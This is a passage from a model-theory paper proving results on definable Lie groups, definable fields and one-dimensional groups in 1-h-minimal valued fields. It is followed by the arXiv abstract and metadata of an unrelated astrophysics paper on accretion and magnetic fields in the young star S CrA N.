surjective definable group morphism. Then \(f\) is a submersion._ Proof.: This is a consequence of Sard's Lemma, Proposition 5.21. **Fact 6.8**.: _Suppose \(X\) is a topological space and \(Y\subset X\) is a finite union of locally closed subsets of \(X\). Then every open nonempty subset of \(X\) contains an open nonempty subset which is disjoint from \(Y\) or contained in \(Y\)._ Proof.: The property mentioned is closed under Boolean combinations and is true for open subsets. **Proposition 6.9**.: _Suppose \(G\) is a definable group and \(H\subset G\) is a definable subgroup. Then \(H\) is closed in \(G\)._ Proof.: Recall that \(H\) is a finite union of locally closed subsets of \(G\), see for instance Proposition 5.12. So by applying Fact 6.8 to \(H\subset\bar{H}\), we conclude that \(H\) has nonempty relative interior in \(\bar{H}\). As \(H\) is a subgroup we conclude by translation that \(H\) is open in \(\bar{H}\). An open subgroup is the complement of some of its translates, so it is also closed. We conclude that \(H=\bar{H}\) is closed. 
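Returning to Fact 6.6, the three formulas can be verified by hand on the local group \(a\cdot b=a+b+ab\) given after Definition 6.5 (again an illustration added here, not part of the original text):
\[m(x,y)=x+y+xy\ \Rightarrow\ m^{\prime}(0)(u,v)=u+v,\qquad i(x)=\frac{-x}{1+x}\ \Rightarrow\ i^{\prime}(0)(u)=-u,\]
since the derivative of \(-x/(1+x)\) at \(0\) is \(-1\), and
\[p_{2}(x)=x\cdot x=2x+x^{2}\ \Rightarrow\ p_{2}^{\prime}(0)(u)=2u,\]
in agreement with \(p_{n}^{\prime}(0)(x)=nx\).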
**Proposition 6.10**.: _Suppose \(H\subset G\) is a subgroup of \(G\). Then with the structure of weak definable strictly differentiable manifolds on \(G\) and \(H\), the inclusion \(i:H\to G\) is a closed embedding._ Proof.: By Proposition 5.20, there is an open dense set \(U\subset H\) such that \(i|_{U}\) is an embedding. Replacing \(U\) by \(U^{\prime}=U\setminus\operatorname{cl}(i(H)\setminus i(U))\) if necessary, and keeping in mind Proposition 2.18 to show \(U^{\prime}\) is large in \(H\), we may assume \(i(U)\) is open in \(i(H)\). By translation we conclude that \(i\) is an immersion. Also for an open set \(V\subset H\) we have that \(i(V)=i(\bigcup_{h\in H}hU\cap V)=\bigcup_{h}hi(U\cap h^{-1}V)\) is open in \(i(H)\). Since \(i\) is injective, the conclusion follows. As a consequence of the theorem on constant rank functions, Proposition 4.11, we have the following result: **Corollary 6.11**.: _Suppose \(U\) and \(V\) are definable strictly differentiable local Lie groups and let \(g,f:U\to V\) be definable strictly differentiable local Lie group morphisms. If we denote \(Z=\{x\in U:g(x)=f(x)\}\), then \(\dim_{e}Z=\dim(\ker(f^{\prime}(e)-g^{\prime}(e)))\)._ _In particular if \(G\) and \(H\) are definable strictly differentiable weak Lie groups and \(g,f\) are definable strictly differentiable Lie group morphisms then \(\dim\{x:f(x)=g(x)\}=\dim(\ker(f^{\prime}(e)-g^{\prime}(e)))\)._ Proof.: The second result follows from the first because of Lemma 5.8. In order to keep the proof readable we only verify the first statement in the case of weak Lie groups. The proof for local Lie groups is similar. By translating in \(G\) we see that the map \(f\cdot g^{-1}:G\to G\) has, at any point of \(G\), derivatives of constant rank equal to \(\dim(G)-k\), for \(k=\dim(\ker(f^{\prime}(e)-g^{\prime}(e)))\). Indeed, if \(u\in G\), then \((f\cdot g^{-1})L_{u}=L_{f(u)}R_{g(u)^{-1}}(f\cdot g^{-1})\), where \(L_{u}\), \(R_{u}\) denote the left and right translates by \(u\), respectively. By the chain rule we get \((f\cdot g^{-1})^{\prime}(u)L_{u}^{\prime}(e)=(L_{f(u)}R_{g(u)^{-1}})^{\prime}( f(u)\cdot g(u)^{-1})(f\cdot g^{-1})^{\prime}(e)\). As \(L_{u}\) and \(L_{f(u)}R_{g(u)}\) are definable strict diffeomorphisms, we have that their derivatives at any point are vector space isomorphisms, so we conclude that the rank of \((f\cdot g^{-1})^{\prime}(u)\) equals the rank of \((f\cdot g^{-1})^{\prime}(e)=f^{\prime}(e)-g^{\prime}(e)\) (see Fact 6.6), as desired. By the theorem on constant rank functions, Proposition 4.11, we conclude that there are nonempty open sets \(U\subset G\) and \(V\subset H\), balls \(B_{1},B_{2}\) and \(B_{3}\) around the origin and definable strictly differentiable isomorphisms \(\varphi_{1}:U\to B_{1}\times B_{2}\) and \(\varphi_{2}:V\to B_{1}\times B_{3}\), such that \(f(U)\subset V\) and \(\varphi_{2}f=\varphi_{1}\alpha\) for \(\alpha:B_{1}\times B_{3}\to B_{1}\times B_{3}\) the function \((x,y)\mapsto(x,0)\). Translating in \(G\) we may assume \(e\in U\). More precisely, from the formula \((f\cdot g^{-1})L_{u}=(L_{f(u)}R_{g(u)^{-1}})(f\cdot g^{-1})\) discussed before, if \(u\in U\) maps to \((0,0)\) under \(\varphi_{1}\), then \(e\in u^{-1}U\), so we may replace \((U,V,\varphi_{1},\varphi_{2})\) by \((u^{-1}U,f(u)^{-1}Vg(u),\varphi_{1}L_{u},\varphi_{2}L_{f(u)}R_{g(u)}^{-1})\). Note also that \(\varphi_{1}(e)=(0,0)\). 
In this case we obtain \(\{0\}\times B_{2}=\varphi_{1}(Z\cap U)\), so the local dimension of \(Z\) at \(e\) is the local dimension of \(\{0\}\times B_{2}\subset B_{1}\times B_{2}\) at \((0,0)\), which is the dimension of \(B_{2}\) and is as in the statement. In the particular case where the dimension \(\dim(\ker(f^{\prime}(e)-g^{\prime}(e)))\) of the previous statement equals the dimension of \(G\), we get: **Corollary 6.12**.: _Suppose \(U\) and \(V\) are definable strictly differentiable local Lie groups and let \(g,f:U\to V\) be definable strictly differentiable local Lie group morphisms. Then \(f\) and \(g\) are equal (as local Lie group morphisms) if and only if \(f^{\prime}(0)=g^{\prime}(0)\)._ _In particular if \(G\) and \(H\) are definable strictly differentiable weak Lie groups and \(g,f\) are definable strictly differentiable Lie group morphisms then \(f\) and \(g\) coincide in an open neighborhood of the identity \(e\) if and only if \(f^{\prime}(e)=g^{\prime}(e)\)._ The following two corollaries are not needed for the sequel, but may be interesting in their own right. **Corollary 6.13**.: _Suppose \(H_{1}\) and \(H_{2}\) are subgroups of the strictly differentiable definable weak Lie group \(G\). Then \(T_{e}(H_{1}\cap H_{2})=T_{e}(H_{1})\cap T_{e}(H_{2})\) as subspaces of \(T_{e}(G)\)._ Proof.: This is a consequence of Corollary 6.11. Indeed, we know \(H_{1}\), \(H_{2}\) and \(H_{1}\cap H_{2}\) are strictly differentiable definable weak Lie groups and the inclusion maps \(H_{1}\cap H_{2}\to H_{i}\) and \(H_{i}\to G\) are strictly differentiable immersions, for example by Proposition 6.10, so the statement makes sense. We also have that the diagonal map \(\Delta:H_{1}\cap H_{2}\to H_{1}\times H_{2}\) is the equalizer of the two projections \(p_{1}:H_{1}\times H_{2}\to G\) and \(p_{2}:H_{1}\times H_{2}\to G\). The kernel of \(p_{1}^{\prime}(e)-p_{2}^{\prime}(e)\) is the image under the diagonal map of \(T_{e}(H_{1})\cap T_{e}(H_{2})\). So by the equality of the dimensions in Corollary 6.11 we conclude \(T_{e}(H_{1}\cap H_{2})=T_{e}(H_{1})\cap T_{e}(H_{2})\). **Corollary 6.14**.: _If \(G\) is a definable strictly differentiable weak Lie group and \(H_{1},H_{2}\) are subgroups, then there is \(U\subset G\) an open neighborhood of \(e\) such that \(U\cap H_{1}=U\cap H_{2}\) if and only if \(T_{e}(H_{1})=T_{e}(H_{2})\)._ Proof.: By Corollary 6.13 we get \(T_{e}(H_{3})=T_{e}(H_{1})=T_{e}(H_{2})\) for \(H_{3}=H_{1}\cap H_{2}\). Then as the inclusion \(H_{3}\to H_{1}\) produces an isomorphism of tangent spaces at the identity we conclude by the inverse function theorem 4.4 that there is \(U\subset G\) an open neighborhood of the identity, such that \(U\cap H_{1}=U\cap H_{3}\). Note that this also uses that the topology of \(H_{1}\) and \(H_{3}\) which makes them strictly differentiable definable Lie groups coincides with the subgroup topology coming from \(G\), see Proposition 6.10. Symmetrically we have \(U^{\prime}\cap H_{2}=U^{\prime}\cap H_{3}\) for some open \(U^{\prime}\). Taking \(U\cap U^{\prime}\) gives the desired neighborhood; the converse implication is immediate. Next we give the familiar definition of the Lie bracket in \(T_{e}(G)\) for the definable Lie group \(G\), and show it forms a Lie algebra. **Definition 6.15**.: Suppose \(G\) is a definable strictly differentiable weak Lie group. For \(g\in G\) we consider the map \(c_{g}:G\to G\) defined by \(c_{g}(h)=ghg^{-1}\). Then \(c_{g}\) is a definable group morphism and so it is strictly differentiable, see Proposition 5.7. 
Its derivative produces a map \(\operatorname{Ad}:G\to\operatorname{Aut}_{K}(T_{e}(G))\), \(g\mapsto c_{g}^{\prime}(e)\) which is a definable map and a group morphism by the chain rule and the equation \(c_{g}c_{h}=c_{gh}\). Then \(\operatorname{Ad}\) is strictly differentiable and so its derivative at \(e\) gives a linear map \(\operatorname{ad}:T_{e}(G)\to\operatorname{End}_{K}(T_{e}(G))\). In other words this gives a bilinear map \((x,y)\mapsto\operatorname{ad}(x)(y)\), \(T_{e}(G)\times T_{e}(G)\to T_{e}(G)\) denoted \((x,y)\mapsto[x,y]\). This map is called the Lie bracket. **Proposition 6.16**.: _Let \(G\) be a definable weak \(T_{2}\)-Lie group. Let \(0\in U\subset K^{n}\) be an open set and \(i:U\to G\) a \(T_{2}\)-diffeomorphism of \(U\) onto an open subset of \(G\), that sends \(0\) to \(e\). Make \(U\) into a local definable group via \(i\). Then under the identification \(i^{\prime}(0):K^{n}\to T_{e}(G)\) we have that the Lie bracket is characterized by the property \(x\cdot y\cdot x^{-1}\cdot y^{-1}=[x,y]+O(x,y)^{3}\), for \(x,y\in U\)._ Proof.: We have that the function \(f(x,y)=x\cdot y\cdot x^{-1}\) satisfies \(f(0,y)=y\) and \(f(x,0)=0\), so its Taylor approximation of order 2 is of the form \(f(x,y)=y+axy+O(x,y)^{3}\). Indeed it is of the form \(a_{0}+a_{1}x+a_{2}y+a_{3}x^{2}+a_{4}xy+a_{5}y^{2}+O(x,y)^{3}\) and plugging \(x=0\) and using the uniqueness of the Taylor approximation we get \(a_{0}=a_{5}=0\) and \(a_{2}=1\), and a similar argument with \(y=0\) gives \(a_{1}=a_{3}=0\), so \(f(x,y)=y+axy+O(x,y)^{3}\) as claimed. From the definition of \(\operatorname{Ad}(x)\) we get \(f(x,y)=\operatorname{Ad}(x)y+O_{x}(y^{2})\) where \(O_{x}\) means the coefficient may depend on \(x\). Note that the definition of \(\operatorname{ad}(x)\) gives \(\operatorname{Ad}(x)(y)=y+[x,y]+O(x^{2}y)\). Indeed, we have \(\operatorname{Ad}(x)=\operatorname{Ad}(0)+\operatorname{Ad}^{\prime}(0)(x)+O( x^{2})=I+\operatorname{ad}(x)+O(x^{2})\), where \(I\) is the identity matrix, and evaluating at \(y\) we conclude \(\operatorname{Ad}(x)y=y+[x,y]+O(x^{2}y)\). We conclude that \(y+axy+O(x,y)^{3}=y+[x,y]+O_{x}(y^{2})\). This implies \([x,y]=axy\). See Lemma 3.15. Now from \(x\cdot y\cdot x^{-1}=y+axy+O(y,x)^{3}\), and the formula \(x\cdot y^{-1}=x-y+b_{0}x^{2}+b_{1}xy+b_{2}y^{2}+O(x,y)^{3}\) (see Fact 6.6), we get \(x\cdot y\cdot x^{-1}\cdot y^{-1}=(x\cdot y\cdot x^{-1})\cdot y^{-1}=axy+b_{3}y^ {2}+O(x,y)^{3}\). On the other hand if \(c(x,y)=x\cdot y\cdot x^{-1}\cdot y^{-1}\) then \(c(0,y)=0\) implies that \(b_{3}=0\), as required. **Proposition 6.17**.: _Let \(G\) be a definable strictly differentiable weak Lie group. Then \((T_{e}(G),[,])\) is a Lie algebra._ Proof.: We have to prove \([x,x]=0\) and the Jacobi identity. We will use the characterization of Proposition 6.16 (we may assume \(G\) is \(T_{2}\) by Proposition 6.4). \([x,x]=0\) now follows immediately. The idea of proof of the Jacobi identity is to express \(xyz\) as \(f(x,y,z)zyx\) in two different ways using associativity, the first one permutes from left to right, the second permutes \(yz\) and then permutes from left to right. The details follow. 
Writing \(c(x,y)=xyx^{-1}y^{-1}\) one has \[xyz=c(x,y)yxz=c(x,y)yc(x,z)zx=c(x,y)([y,c(x,z)]+O(y,c(x,z))^{3})c(x,z)yzx=\] \[c(x,y)([y,[x,z]]+O(x,y,z)^{4})c(x,z)c(y,z)zyx=\] \[(c(x,y)+[y,[x,z]]+c(x,z)+c(y,z)+O(x,y,z)^{4})zyx.\] At the last step we use the formula \(xy=x+y+O(x,y)^{2}\). On the other hand, \[xyz=xc(y,z)zy=([x,c(y,z)]+O(x,c(y,z))^{3})c(y,z)xzy=\] \[([x,[y,z]]+O(x,y,z)^{4})c(y,z)c(x,z)zxy=([x,[y,z]]+O(x,y,z)^{4})c(y,z)c(x,z)zc(x,y)yx=\] \[([x,[y,z]]+O(x,y,z)^{4})c(y,z)c(x,z)([z,[x,y]]+O(x,y,z)^{4})c(x,y)zyx=\] \[([x,[y,z]]+c(y,z)+c(x,z)+c(x,y)+[z,[x,y]]+O(x,y,z)^{4})zyx.\] From this we get \([y,[x,z]]=[x,[y,z]]+[z,[x,y]]+O(x,y,z)^{4}\) and from the uniqueness of Taylor expansions we obtain \([y,[x,z]]=[x,[y,z]]+[z,[x,y]]\) which is the Jacobi identity. Given a strictly differentiable definable weak Lie group \(G\), we denote by \(\operatorname{Lie}(G)\) the tangent space \(T_{e}(G)\) considered as a Lie algebra with the Lie bracket \([x,y]\). ## 7. Definable fields In this section we prove that if \(L\) is a definable field in a 1-h-minimal valued field then, as a definable field, \(L\) is isomorphic to a finite field extension of \(K\). This result generalizes [2, Theorem 4.2], where this is proved for real closed valued fields, and [12, Theorem 4.1] where this is proven for \(p\)-adically closed fields. With the terminology and results we have developed in the previous section, the main ingredients of the proof are similar to those appearing in the classification of infinite fields definable in o-minimal fields, [10, Theorem 1.1]. **Lemma 7.1**.: _Suppose \(K\) is 1-h-minimal, \(L\subseteq K\) a definable subfield. Then \(L=K\)._ Proof.: \(L\) is a definable set which is infinite because the characteristic of \(K\) is \(0\). We conclude that there is a nonempty open ball \(B\subset L\), for example by dimension theory, item 2 of Proposition 2.11. The field generated by a nonempty open ball is \(K\). Indeed, \(B-B\) contains a ball \(B^{\prime}\) around the origin, \(C=(B^{\prime}\setminus\{0\})^{-1}\) is the complement of a closed ball, and \(C-C=K\). **Lemma 7.2**.: _Suppose \(K\) is 1-h-minimal. Let \(F_{1}\) and \(F_{2}\) be finite extensions of \(K\), and consider them as definable fields in \(K\). If \(\varphi:F_{1}\to F_{2}\) is a definable field morphism, then \(\varphi\) is a morphism of \(K\) extensions, in other words it is the identity when restricted to \(K\)._ Proof.: The set \(\{x\in K:\varphi(x)=x\}\) is a definable subfield of \(K\), so Lemma 7.1 gives the desired conclusion. **Proposition 7.3**.: _Suppose \(K\) is 1-h-minimal and \(F\) is a definable field. Then \(F\) is isomorphic as a definable field to a finite extension of \(K\). The forgetful functor from finite \(K\)-extensions to definable fields is an equivalence of categories._ Proof.: That the functor is full is Lemma 7.2. Let \(F\) be a definable field. By Proposition 6.4 we have that \((F,+)\) is a definable strictly differentiable weak Lie group. If \(a\in F\), the map \(L_{a}:x\mapsto ax\) is a definable group morphism and so it is strictly differentiable, by the fullness in Proposition 6.4. We get a definable map \(f:F\to M_{n}(K)\) defined as \(a\mapsto L_{a}^{\prime}(0)\). By the chain rule we have \(f(ab)=f(a)f(b)\) for all \(a,b\in F\). Clearly \(f(1)=1\). Finally one has \(f(a+b)=f(a)+f(b)\) (the derivative of multiplication \(G\times G\to G\) in a Lie group is the sum map, see for instance Fact 6.6). We conclude that \(f\) is a ring map, and because \(F\) is a field it is injective. 
If we set \(i:K\to M_{n}(K)\) to be the map given by \(i(k)=kI\), where \(I\) is the identity matrix, then \(i^{-1}f(F)\subset K\) is a definable subfield of \(K\), and so by Lemma 7.1 one has \(i(K)\subset f(F)\). So \(F/K\) is a finite field extension as required. ## 8. One dimensional groups are finite by abelian by finite In this section we prove that if \(K\) is a 1-h-minimal valued field and \(G\) is a one dimensional group definable in \(K\) then \(G\) is finite-by-abelian-by-finite. This generalizes [13, Theorem 2.5] where it is proved that one dimensional groups definable in p-adically closed fields are abelian-by-finite. This result is analogous to [11, Corollary 2.16] where it is shown that a one dimensional group definable in an o-minimal structure is abelian-by-finite. The proof here is not a straightforward adaptation of either, since we do not assume NIP, making the argument more involved. **Definition 8.1**.: Let \(G\) be a group. We let \(C^{w}\) denote the set of elements \(x\in G\) whose centralizer, \(c_{G}(x)\), has finite index in \(G\). Note that \(C^{w}\) is a characteristic subgroup of \(G\). **Lemma 8.2**.: _Suppose \(G\) is an (abstract) group. Take \(C^{w}\) as in Definition 8.1 and let \(Z\) be the center of \(C^{w}\). Then \(C^{w}\) and \(Z\) are characteristic subgroups of \(G\), and \(Z\) is commutative. Moreover \(Z\) has finite index in \(G\) if and only if \(G\) is abelian-by-finite._ _When \(G\) is definable in a geometric theory, \(C^{w}\) and \(Z\) are definable. Also \(x\in C^{w}\) if and only if \(\dim(c_{G}(x))=\dim(G)\)._ Proof.: It is clear that \(C^{w}\) and \(Z\) are characteristic, and that \(Z\) is abelian. So, in particular, if \([G:Z]<\infty\) then \(G\) is abelian-by-finite. On the other hand, if \(A\) is an abelian subgroup of finite index then \(A\subset C^{w}\), as \(A\subset c_{G}(a)\) for every \(a\in A\). If \(a_{1},\ldots,a_{n}\) are a set of representatives for left cosets of \(A\) in \(C^{w}\) then \(\bigcap_{k=1}^{n}c_{G}(a_{k})\cap A\subset Z\), and as \(a_{k}\in C^{w}\), the \(c_{G}(a_{k})\) have finite index in \(G\), and so \(Z\) has finite index in \(G\). If \(G\) is definable in a geometric theory note that \(x\in C^{w}\) if and only if \(x^{G}\), the orbit of \(x\) under conjugation, is finite. This is because the fibers of the map \(g\mapsto x^{g}\) are cosets of \(c_{G}(x)\). So \(C^{w}\) is definable because a geometric theory eliminates the quantifier \(\exists^{\infty}\) (there exist infinitely many). We also get that if \(\dim(c_{G}(x))=\dim(G)\) then \(c_{G}(x)\) is of finite index. **Lemma 8.3**.: _Suppose \(f:X\times Y\to Z\) is a function definable in a pregeometric theory. Denote \(n=\dim(X)\) and \(m=\dim(Y)\). Suppose for all \(x\in X\) the nonempty fibers of the function \(f_{x}(y)=f(x,y)\) have dimension \(m\). Suppose that for all \(y\in Y\) the nonempty fibers of the function \(f_{y}(x)=f(x,y)\) have dimension \(n\). Then \(f\) has finite image._ Proof.: We claim that the nonempty fibers of \(f\) have dimension \(n+m\). Indeed, if \((x_{0},y_{0})\in X\times Y\), then \(f^{-1}f(x_{0},y_{0})\) contains \(\cup_{x\in f_{y_{0}}^{-1}f_{y_{0}}(x_{0})}\{x\}\times f_{x}^{-1}f_{x}(y_{0})\), so the claim follows by the additivity of dimension. If the image of \(f\) were infinite, additivity of dimension applied to \(f\) would give \(\dim(X\times Y)\geq 1+n+m\), a contradiction, so the image of \(f\) is finite. **Lemma 8.4**.: _Suppose \(G\) is definable in a pregeometric theory and \(G=C^{w}\). Then the image of the commutator map \(c:G\times G\to G\) is finite._ Proof.: The commutator map \(c(x,y)\) is constant when \(x\) is fixed and \(y\) varies over a right coset of \(c_{G}(x)\), and it is constant when \(y\) is fixed and \(x\) varies over a right coset of \(c_{G}(y)\). 
This implies that the image of \(c\) is finite, see Lemma 8.3. **Lemma 8.5**.: _Suppose \(G\) is an \(n\)-dimensional group definable in a pregeometric theory such that \(G=C^{w}\). Then there is a definable characteristic subgroup, \(G_{1}\), of finite index with a characteristic finite subgroup \(L\), central in \(G_{1}\), such that \(G_{1}/L\) is abelian. If \(Z\) is the center of \(G_{1}\) then \(Z/L\) contains \((G_{1}/L)^{m}\), the \(m\)-th powers of \(G_{1}/L\), for some \(m\)._ _If the theory is NIP then the center of \(G\) has finite index._ Proof.: If the theory has NIP then the center has finite index by Baldwin-Saxl (e.g., [14, Lemma 1.3]). Indeed, \(Z=\bigcap_{g\in G}c_{G}(g)\) is an intersection of a definable family of subgroups, each of which has finite index by the assumption \(G=C^{w}\). So, as \(G\) is NIP, one gets that \(Z\) is the intersection of finitely many of the centralizers and \([G:Z]<\omega\). In general, by Lemma 8.4 we know that \(c(G,G)\) is finite. Let \(G_{1}\) be the centralizer of \(c(G,G)\); it has finite index in \(G\) by the hypothesis that \(G=C^{w}\). Clearly \(G_{1}\) is characteristic in \(G\), so we may replace \(G\) by \(G_{1}\) and assume that \(c(G,G)\) is contained in the center of \(G\). In this case we prove that \(c(G,G)\) generates a finite central characteristic group \(L=D(G)\). Indeed, since \(c(G,G)\) is central, a simple computation shows \(c(gh,x)=c(g,x)c(h,x)\) for all \(g,h,x\in G\). It follows that \(c(g,h)^{m}=c(g^{m},h)\) is in \(c(G,G)\) for every \(m\); since \(c(G,G)\) is finite, two distinct powers of \(c(g,h)\) coincide, and thus \(c(g,h)\) has finite order. As \(c(G,G)\) is central with elements of finite order, the group it generates is central and finite. It is obviously characteristic. We also see that if \(m\) is the order of \(D(G)\) then \(g^{m}\in Z\) for all \(g\in G\). This is because \(c(g^{m},h)=c(g,h)^{m}=1\), so \((G/D(G))^{m}\) is contained in \(Z/D(G)\) as required. **Lemma 8.6**.: _Suppose \(G\) is an \(n\)-dimensional abelian group definable in a 1-\(h\)-minimal theory. Then the \(m\)-torsion of \(G\) is finite and \(G^{m}\subset G\) is a subgroup of dimension \(n\)._ Proof.: The map \(x\mapsto x^{m}\) is a definable group morphism with invertible derivative at the identity, see for instance Fact 6.6, so by Corollary 6.11 we get that the \(m\)-torsion of \(G\) is finite, and so by additivity of dimension \(\dim(G^{m})=\dim(G)=n\). **Lemma 8.7**.: _Suppose \(G\) is an \(n\)-dimensional group definable in a 1-h-minimal field. Then \(C^{w}\) is the kernel of the map \(\operatorname{Ad}:G\to GL_{n}(K)\)._ _If the Lie algebra \(\operatorname{Lie}(G)\) is abelian, then \(C^{w}\) has finite index._ Proof.: The first statement follows from Corollary 6.12 and Lemma 8.2. If the Lie algebra is abelian, then, by the definition of the Lie bracket, the derivative of \(\operatorname{Ad}\) at \(e\) is \(0\). This means that \(C^{w}=\ker(\operatorname{Ad})\) contains an open neighborhood of \(e\) by Corollary 6.12, so \(C^{w}\) is \(n\)-dimensional. As \(C^{w}\) is then an \(n\)-dimensional subgroup, we conclude that \(C^{w}\) has finite index in \(G\) by the additivity of dimension. **Lemma 8.8**.: _Suppose \(G\) is an \(n\)-dimensional finite-by-abelian group definable in a 1-h-minimal theory. Then \(G=C^{w}\) and the center of \(G\) has dimension \(n\)._ Proof.: Let \(H\) be a finite normal subgroup such that \(G/H\) is abelian. By elimination of finite imaginaries in fields we have that \(G/H\) is definable. 
Also by Corollary 6.11 we see that the quotient map \(p:G\to G/H\) induces an isomorphism of tangent spaces at the identity, and under this isomorphism \(1=\operatorname{Ad}(p(g))=\operatorname{Ad}(g)\) for all \(g\in G\). We conclude that \(G=C^{w}\), by Lemma 8.7. Now if we apply Lemma 8.5 we get characteristic groups \(L\subset G_{1}\subset G\) such that \(G/G_{1}\) is finite, \(L\) is finite and \(G_{1}/L\) is abelian, and \(Z(G_{1})/L\supset(G_{1}/L)^{m}\) for some \(m\). Note that \(Z(G)\) contains a finite index subgroup of \(Z(G_{1})\) (namely the elements of \(Z(G_{1})\) centralizing a set of representatives of the finitely many cosets of \(G_{1}\) in \(G\)), so we just have to see that \((G_{1}/L)^{m}\) has dimension \(n\). This follows from Lemma 8.6. **Proposition 8.9**.: _Suppose \(K\) is 1-h-minimal. Suppose \(G\) is a strictly differentiable definable weak Lie group. Then \(\operatorname{Lie}(G)\) is abelian if and only if \(G\) is finite-by-abelian-by-finite. In this case \(G\) has characteristic definable subgroups \(L\subset G_{1}\subset G\) such that \(G/G_{1}\) is finite, \(G_{1}/L\) is abelian, and \(L\) is finite and central in \(G_{1}\). Also if \(Z\) is the center of \(G_{1}\), then \(Z\) is \(n\)-dimensional, where \(n=\dim(G)\), and \(Z/L\) contains \((G_{1}/L)^{m}\) for some \(m\)._ _If \(K\) is NIP then we may take \(L=1\)._ Proof.: This follows by putting the previous results together, Lemmas 8.7, 8.5, 8.8. **Corollary 8.10**.: _Suppose \(G\) is a one dimensional group definable in a 1-h-minimal valued field. Then \(G\) is finite-by-abelian-by-finite. If the theory is NIP then \(G\) is abelian-by-finite._ Proof.: By Proposition 6.4 we get that \(G\) is a strictly differentiable definable weak Lie group. The result now follows from Proposition 8.9 because the only one dimensional Lie algebra is abelian. In the NIP case this corollary follows more directly from the fact that a definable group is definably weakly Lie. Indeed, this implies that for every \(n\geq 1\) there is an element \(x\in G\) with \(x^{n}\neq e\) (because the derivative of the map \(x\mapsto x^{n}\) at \(e\) is \(v\mapsto nv\), which is not equal to \(0\), see Fact 6.6). By \(\aleph_{0}\)-saturation there is an \(x\in G\) such that the group generated by \(x\) is infinite. Then by [13], Remark 2.4, one has that the centralizer of the centralizer of \(x\) has finite index and is abelian. Indeed, note that if \(a\in c_{G}(x)\), \(c_{G}(a)\) contains the group generated by \(x\), and so it is of dimension \(1\). The last corollary shows that the classification of one dimensional abelian groups definable in ACVF carried out in [1] extends to all definable \(1\)-dimensional groups, for \(K\) of characteristic \(0\) (see also the main result of [7]). I.e., since \(\operatorname{ACVF}_{0}\) is 1-h-minimal and NIP, 1-dimensional definable groups are abelian-by-finite, and the classification of definable \(1\)-dimensional abelian groups of [1] applies. We do not know if this corollary is true in \(\mathrm{ACVF}_{p,p}\). Similarly, the commutativity assumption is unnecessary in the classification of \(1\)-dimensional groups definable in pseudo-local fields of residue characteristic \(0\). As those are pure henselian fields, they, too, are 1-h-minimal, so we may apply Proposition 8.9. To get the full result we observe that though pseudo-local fields are not NIP, an inspection of the list of the definable \(1\)-dimensional abelian groups, \(A\), obtained in [1] shows they are almost divisible (i.e., \(nA\) has finite index in \(A\) for all \(n\)). 
Therefore, in the notation of Proposition 8.9 the center of \(G_{1}\) has finite index in \(G_{1}\), and so every one dimensional group is abelian-by-finite. **Question 8.11**.: If \(G\) is finite-by-abelian, does the center of \(G\) have finite index in \(G\)? This is true if the theory is NIP or if \(nA\) has finite index in \(A\) for every abelian definable group, by Lemmas 8.8 and 8.5. **Remark 8.12**.: \(\mathrm{ACVF}_{p,p}\) does not fit into the framework of 1-h-minimality. However, many of the ingredients in previous sections translate to this setting. For example: \(K\) is geometric, a subset of \(K^{n}\) has dimension \(n\) if and only if it contains a nonempty open set, one-to-finite functions defined in an open set are generically continuous, functions definable in an open set are generically continuous, and \(K\) is definably spherically complete. That one-to-finite functions are generically continuous follows from the fact that \(\mathrm{acl}(a)\) coincides with the field-theoretic algebraic closure of \(a\) and by a suitable result about continuity of roots. That functions are generically continuous follows from the fact that \(\mathrm{dcl}(a)\) is the Henselization of the perfect closure of \(a\), so a definable function is definably piecewise a composition of rational functions, inverse of the Frobenius automorphism and roots of Hensel polynomials, all of these functions being continuous. However, the inverse of the Frobenius is not differentiable anywhere, so Proposition 3.12 does not hold. Also the Frobenius is an homeomorphism with \(0\) derivative, so for example Proposition 4.6 does not hold.
2308.03442
Star-disk interactions in the strongly accreting T Tauri Star S CrA N
Aims : We aimed at constraining the accretion-ejection phenomena around the strongly-accreting Northern component of the S CrA young binary system (S CrA N) by deriving its magnetic field topology and its magnetospheric properties, and by detecting ejection signatures, if any. Methods : We led a two-week observing campaign on S CrA N with the ESPaDOnS optical spectropolarimeter at the Canada-France-Hawaii Telescope. We recorded 12 Stokes I and V spectra over 14 nights. We computed the corresponding Least-Square Deconvolution (LSD) profiles of the photospheric lines and performed Zeeman-Doppler Imaging (ZDI). We analysed the kinematics of noticeable emission lines, namely He I $\lambda 5876$ and the four first lines of the Balmer series, known to trace the accretion process. Conclusions : The findings from spectropolarimetry are complementary to those provided by optical long-baseline interferometry, allowing us to construct a coherent view of the innermost regions of a young, strongly accreting star. Yet, the strong and complex magnetic field reconstructed for S CrA N is inconsistent with the observed magnetic signatures of the emission lines associated to the post-shock region. We recommend a multi-technique, synchronized campaign of several days to put more constrains on a system that varies on a $\sim$ 1 day timescale.
H. Nowacki, E. Alecian, K. Perraut, B. Zaire, C. P. Folsom, K. Pouilly, J. Bouvier, R. Manick, G. Pantolmos, A. P. Sousa, C. Dougados, G. A. J. Hussain, S. H. P. Alencar, J. B. Le Bouquin
2023-08-07T09:57:31Z
http://arxiv.org/abs/2308.03442v1
# Star-disk interactions in the strongly accreting T Tauri Star S CrA N+ ###### Abstract Context:Classical T Tauri Stars are thought to accrete material from their surrounding protoplanetary disks through funnel flows along their magnetic field lines. Among them, those with high accretion rates (\(\sim 10^{-7}\)M\({}_{\odot}\) yr\({}^{-1}\)) are ideal targets to test this magnetospheric accretion scenario in a sustained regime. Aims:We aimed at constraining the accretion-ejection phenomena around the strongly-accreting Northern component of the S CrA young binary system (S CrA N) by deriving its magnetic field topology and its magnetospheric properties, and by detecting ejection signatures, if any. Methods:We led a two-week observing campaign on S CrA N with the ESPaDOnS optical spectropolarimeter at the Canada-France-Hawaii Telescope. We recorded 12 Stokes \(I\) and \(V\) spectra over 14 nights. We computed the corresponding Least-Square Deconvolution (LSD) profiles of the photospheric lines and performed Zeeman-Doppler Imaging (ZDI). We analysed the kinematics of noticeable emission lines, namely He I \(\lambda\)5876 and the first four lines of the Balmer series, known to trace the accretion process. Results:We found that S CrA N is a low-mass (0.8 M\({}_{\odot}\)), young (\(\sim 1\) Myr), and fully convective object exhibiting a strong and variable veiling (with a mean value of \(7\pm 2\)), which suggests that the star is in a strong accretion regime. These findings could indicate a stellar evolutionary stage between Class I and Class II for S CrA N. We reconstructed an axisymmetric large-scale magnetic field (\(\sim 70\)% of the total energy), primarily located in the dipolar component but with significant higher poloidal orders. From the He I \(\lambda\)5876 narrow emission component radial velocity curve, we derived a stellar rotation period of \(P_{*}=7.3\pm 0.2\) days. We found a magnetic truncation radius of \(\sim 2\) R\({}_{*}\), which is significantly closer to the star than the corotation radius 